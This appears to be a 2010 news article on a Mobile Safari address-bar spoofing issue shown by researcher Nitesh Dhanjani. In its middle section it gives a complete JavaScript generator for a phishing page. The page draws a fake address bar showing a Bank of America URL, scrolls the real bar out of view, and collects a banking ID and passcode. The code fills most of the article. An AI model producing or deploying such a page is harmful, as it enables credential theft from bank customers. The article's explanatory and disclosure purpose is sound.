November 30, 2010

A quirk in how some mobile browsers display the address bar gives fraudsters an opportunity to trick users into believing they are visiting a trusted site.

Security researcher Nitesh Dhanjani demonstrates the problem in a blog post for the computer security training group SANS, using Bank of America's mobile banking site on iOS as his example. Because Safari on iOS hides its real address bar once a mobile-optimized page has loaded, an attacker need only draw a fake address bar, as ordinary page content, across the top of the page: to an unsuspecting user it looks like the real thing.

A video demonstration follows:

If you watch closely, you will see that Safari does show the real address bar while the page is loading; a user who is not paying attention during the load will miss it. Scrolling back to the top of the page also reveals the con, because the real bar reappears above the fake one, but someone quickly logging in to their bank account has no reason to check. A trusted site is a trusted site. Once the user enters a username and password on the fake page, the fraudsters have credentials they can put to use.
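To make the mechanism concrete, here is an added example (not Dhanjani's code, nor the code shown in his video) of the kind of page that reproduces the spoof. Everything in it is hypothetical: the target URL, the element names and styling, and the use of `window.scrollTo(0, 1)` after load, a common trick of that era for scrolling Mobile Safari's real address bar out of view. The functions return markup as strings so the page can be generated and inspected outside a browser.

```javascript
// Added example of the Mobile Safari address-bar spoof described above.
// Hypothetical throughout: URL, element ids, styling and the scrollTo trick.

const SPOOFED_URL = 'https://www.bankofamerica.com/mobile/'; // hypothetical target

// Escape text before placing it in markup; the fake bar is page content,
// so anything rendered into it must be treated like any other untrusted string.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// The "address bar" is an ordinary <div> pinned to the top of the document.
// It mimics the real bar's layout: a lock glyph followed by the URL.
function fakeAddressBarHtml(url) {
  return (
    '<div id="fake-bar" style="position:absolute;top:0;left:0;width:100%;' +
    'height:44px;background:#c9d4e2;border-bottom:1px solid #7d8fa6;' +
    'font:15px Helvetica,sans-serif;line-height:44px;padding:0 8px;' +
    'box-sizing:border-box">' +
    '<span>&#128274;</span> <span id="fake-url">' + escapeHtml(url) + '</span>' +
    '</div>'
  );
}

// Script embedded in the spoof page. After load, scrolling the document by one
// pixel makes Mobile Safari slide its own address bar off the top of the screen,
// leaving only the fake one visible. Until that scroll runs (i.e. while the page
// is still loading) the real bar is on screen, and scrolling back to the top
// brings it back above the fake one: both are the tells mentioned above.
const HIDE_REAL_BAR_SCRIPT =
  'window.addEventListener("load",function(){' +
  'setTimeout(function(){window.scrollTo(0,1);},0);});';

// Assemble a complete page: viewport meta so the layout matches the device
// width, the hide-bar script, the fake bar, and a login form beneath it.
function buildSpoofDocument(url) {
  return [
    '<!DOCTYPE html>',
    '<html><head>',
    '<meta name="viewport" content="width=device-width,initial-scale=1">',
    '<title>Mobile Banking</title>',
    '<script>' + HIDE_REAL_BAR_SCRIPT + '</script>',
    '</head><body style="margin:0;padding-top:44px">',
    fakeAddressBarHtml(url),
    '<form action="/login" method="post">',
    '<label>Online ID <input name="user"></label>',
    '<label>Passcode <input name="pass" type="password"></label>',
    '<button>Sign In</button>',
    '</form>',
    '</body></html>',
  ].join('\n');
}

// Stand-alone use: print the generated page so it can be saved and loaded
// on a device for inspection.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildSpoofDocument(SPOOFED_URL));
}
```

The point of the example is how little the attacker needs: no browser bug in the usual sense, just styling that matches the real chrome and the browser's own willingness to scroll its address bar away. The fake bar is absolutely positioned rather than fixed, so when the user drags the page back to the top the real bar returns above it and the two bars are visible at once, which is the check a suspicious user can perform.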

As Dhanjani explains:

Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof User Interface elements to display arbitrary URLs, thus tricking the user into thinking he or she is browsing a trusted site.

He notes in his blog post that he contacted Apple about the issue and that the company is aware of its potential implications. Apple did not tell Dhanjani how or when it would address the issue.